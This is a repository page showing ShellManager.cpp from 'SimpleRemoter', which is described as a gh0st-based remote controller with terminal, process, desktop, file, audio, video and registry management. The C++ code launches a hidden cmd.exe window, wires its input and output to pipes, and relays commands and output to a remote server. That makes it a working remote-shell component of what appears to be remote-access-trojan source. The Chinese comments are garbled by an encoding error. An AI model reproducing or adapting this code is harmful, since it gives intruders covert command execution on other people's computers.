admin/SimpleRemoter
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
27fcb6284e1285b2cf606ce2c404ce96ed20d885
SimpleRemoter/client/ShellManager.cpp

192 lines
4.6 KiB
C++
Raw Normal View History

基于gh0st的远程控制器 实现了终端管理、进程管理、窗口管理、桌面管理、文件管理、语音管理、视频管理、服务管理、注册表管理等功能。
2019-01-05 20:21:43 +08:00
// ShellManager.cpp: implementation of the CShellManager class.
//
//////////////////////////////////////////////////////////////////////
#include "stdafx.h"
#include "ShellManager.h"
#include "Common.h"
#include <IOSTREAM>
using namespace std;
//////////////////////////////////////////////////////////////////////
// Construction/Destruction
//////////////////////////////////////////////////////////////////////
BOOL bStarting = TRUE;
CShellManager::CShellManager(IOCPClient* ClientObject, int n):CManager(ClientObject)
{
m_hThreadRead = NULL;
m_hShellProcessHandle = NULL; //<2F><><EFBFBD><EFBFBD>Cmd<6D><64><EFBFBD>̵Ľ<CCB5><C4BD>̾<EFBFBD><CCBE><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>߳̾<DFB3><CCBE><EFBFBD>
m_hShellThreadHandle = NULL;
SECURITY_ATTRIBUTES sa = {0};
sa.nLength = sizeof(sa);
sa.lpSecurityDescriptor = NULL;
sa.bInheritHandle = TRUE; //<2F><>Ҫ
m_hReadPipeHandle = NULL; //client
m_hWritePipeHandle = NULL; //client
m_hReadPipeShell = NULL; //cmd
m_hWritePipeShell = NULL; //cmd
//<2F><><EFBFBD><EFBFBD><EFBFBD>ܵ<EFBFBD>
if(!CreatePipe(&m_hReadPipeHandle, &m_hWritePipeShell, &sa, 0))
{
if(m_hReadPipeHandle != NULL)
{
CloseHandle(m_hReadPipeHandle);
}
if(m_hWritePipeShell != NULL)
{
CloseHandle(m_hWritePipeShell);
}
return;
}
if(!CreatePipe(&m_hReadPipeShell, &m_hWritePipeHandle, &sa, 0))
{
if(m_hWritePipeHandle != NULL)
{
CloseHandle(m_hWritePipeHandle);
}
if(m_hReadPipeShell != NULL)
{
CloseHandle(m_hReadPipeShell);
}
return;
}
//<2F><><EFBFBD><EFBFBD>Cmd FullPath
char strShellPath[MAX_PATH] = {0};
GetSystemDirectory(strShellPath, MAX_PATH); //C:\windows\system32
//C:\windows\system32\cmd.exe
strcat(strShellPath,"\\cmd.exe");
//1 Cmd Input Output Ҫ<>͹ܵ<CDB9><DCB5><EFBFBD>Ӧ<EFBFBD><D3A6>
//2 Cmd Hide
STARTUPINFO si = {0};
PROCESS_INFORMATION pi = {0}; //CreateProcess
memset((void *)&si, 0, sizeof(si));
memset((void *)&pi, 0, sizeof(pi));
si.cb = sizeof(STARTUPINFO); //<2F><>Ҫ
si.dwFlags = STARTF_USESTDHANDLES | STARTF_USESHOWWINDOW;
si.hStdInput = m_hReadPipeShell; //<2F><><EFBFBD>ܵ<EFBFBD><DCB5><EFBFBD>ֵ
si.hStdOutput = si.hStdError = m_hWritePipeShell;
si.wShowWindow = SW_HIDE;
//<2F><><EFBFBD><EFBFBD>Cmd<6D><64><EFBFBD><EFBFBD>
//3 <20>̳<EFBFBD>
if (!CreateProcess(strShellPath, NULL, NULL, NULL, TRUE,
NORMAL_PRIORITY_CLASS, NULL, NULL, &si, &pi))
{
CloseHandle(m_hReadPipeHandle);
CloseHandle(m_hWritePipeHandle);
CloseHandle(m_hReadPipeShell);
CloseHandle(m_hWritePipeShell);
return;
}
m_hShellProcessHandle = pi.hProcess; //<2F><><EFBFBD><EFBFBD>Cmd<6D><64><EFBFBD>̵Ľ<CCB5><C4BD>̾<EFBFBD><CCBE><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>߳̾<DFB3><CCBE><EFBFBD>
m_hShellThreadHandle = pi.hThread;
BYTE bToken = TOKEN_SHELL_START; //<2F><><EFBFBD><EFBFBD>ͷ<EFBFBD>ļ<EFBFBD> Common.h
m_ClientObject->OnServerSending((char*)&bToken, 1);
WaitForDialogOpen();
m_hThreadRead = CreateThread(NULL, 0,
(LPTHREAD_START_ROUTINE)ReadPipeThread, (LPVOID)this, 0, NULL);
}
DWORD WINAPI CShellManager::ReadPipeThread(LPVOID lParam)
{
unsigned long dwReturn = 0;
char szBuffer[1024] = {0};
DWORD dwTotal = 0;
CShellManager *This = (CShellManager*)lParam;
while (bStarting)
{
Sleep(100);
//<2F><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>Ƿ<EFBFBD><C7B7><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD>ݵĴ<DDB5>С<EFBFBD>Ƕ<EFBFBD><C7B6><EFBFBD>
while (PeekNamedPipe(This->m_hReadPipeHandle, //<2F><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
szBuffer, sizeof(szBuffer), &dwReturn, &dwTotal, NULL))
{
//<2F><><EFBFBD><EFBFBD>û<EFBFBD><C3BB><EFBFBD><EFBFBD><EFBFBD>ݾ<EFBFBD><DDBE><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ѭ<EFBFBD><D1AD>
if (dwReturn <= 0)
break;
memset(szBuffer, 0, sizeof(szBuffer));
LPBYTE szTotalBuffer = (LPBYTE)LocalAlloc(LPTR, dwTotal);
//<2F><>ȡ<EFBFBD>ܵ<EFBFBD><DCB5><EFBFBD><EFBFBD><EFBFBD>
ReadFile(This->m_hReadPipeHandle,
szTotalBuffer, dwTotal, &dwReturn, NULL);
This->m_ClientObject->OnServerSending((char*)szTotalBuffer, dwReturn);
LocalFree(szTotalBuffer);
}
}
cout<<"ReadPipe<EFBFBD>߳<EFBFBD><EFBFBD>˳<EFBFBD>"<<endl;
return 0;
}
VOID CShellManager::OnReceive(PBYTE szBuffer, ULONG ulLength)
{
switch(szBuffer[0])
{
case COMMAND_NEXT:
{
NotifyDialogIsOpen();
break;
}
default:
{
unsigned long dwReturn = 0;
if(WriteFile(m_hWritePipeHandle, szBuffer, ulLength, &dwReturn,NULL))
{
}
break;
}
}
}
CShellManager::~CShellManager()
{
bStarting = FALSE;
TerminateProcess(m_hShellProcessHandle, 0); //<2F><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>Լ<EFBFBD><D4BC><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>Cmd<6D><64><EFBFBD><EFBFBD>
TerminateThread(m_hShellThreadHandle, 0); //<2F><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>Լ<EFBFBD><D4BC><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>Cmd<6D>߳<EFBFBD>
Sleep(100);
if (m_hReadPipeHandle != NULL)
{
DisconnectNamedPipe(m_hReadPipeHandle);
CloseHandle(m_hReadPipeHandle);
m_hReadPipeHandle = NULL;
}
if (m_hWritePipeHandle != NULL)
{
DisconnectNamedPipe(m_hWritePipeHandle);
CloseHandle(m_hWritePipeHandle);
m_hWritePipeHandle = NULL;
}
if (m_hReadPipeShell != NULL)
{
DisconnectNamedPipe(m_hReadPipeShell);
CloseHandle(m_hReadPipeShell);
m_hReadPipeShell = NULL;
}
if (m_hWritePipeShell != NULL)
{
DisconnectNamedPipe(m_hWritePipeShell);
CloseHandle(m_hWritePipeShell);
m_hWritePipeShell = NULL;
}
}
Reference in New Issue Copy Permalink